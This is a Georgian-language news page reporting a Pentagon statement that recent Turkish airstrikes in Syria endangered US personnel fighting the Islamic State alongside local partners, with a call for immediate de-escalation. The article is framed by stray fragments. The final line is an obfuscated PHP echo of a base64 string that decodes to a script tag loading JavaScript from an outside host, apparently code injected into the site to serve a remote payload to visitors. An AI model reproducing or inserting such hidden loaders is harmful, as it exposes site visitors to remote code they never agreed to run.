celsiusi
ავერსი შნაიდერი
სირიაში ბოლო საჰაერო დარტყმებმა პირდაპირ საფრთხე შეუქმნა ამერიკელი პერსონალის უსაფრთხოებას, რომლებიც მუშაობენ სირიაში ადგილობრივ პარტნიორებთან ერთად „ისლამური სახელმწიფოს“ დასამარცხებლად,- ამის შესახებ აღნიშნულია აშშ-ის თავდაცვის დეპარტამენტის განცხადებაში.
 
პენტაგონის ინფორმაციით, აშშ ღრმად არის შეშფოთებული ჩრდილოეთ სირიაში, ერაყსა და თურქეთში მოქმედებების ესკალაციის გამო, რომელიც საფრთხეს უქმნის გლობალური კოალიციის პროგრესს „ისლამური სახელმწიფოს“ დამარცხების კუთხით.
 
„სირიაში თურქეთის ბოლო საჰაერო დარტყმებმა პირდაპირ საფრთხე შეუქმნა ამერიკელი პერსონალის უსაფრთხოებას, რომლებიც მუშაობენ სირიაში ადგილობრივ პარტნიორებთან ერთად „ისლამური სახელმწიფოს“ დასამარცხებლად და ათი ათასზე მეტი რადიკალ ისლამისტის პატიმრობის უზრუნველყოფისთვის. მეტიც, არაკოორდინირებული სამხედრო მოქმედებები ერაყის სუვერენიტეტს ემუქრება. აუცილებელია დაუყონებლივ დეესკალაცია, რათა შევინარჩუნოთ ფოკუსირება „ისლამური სახელმწიფოს“ დამარცხების მისიაზე და უზრუნველყოფილ იქნას ადგილზე პერსონალის უსაფრთხოება, რომლებიც ჩართულია „ისლამური სახელმწიფოს“ დამარცხების მისიაში“, – აღნიშნულია პენტაგონის განცხადებაში.
 
 
 
285
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");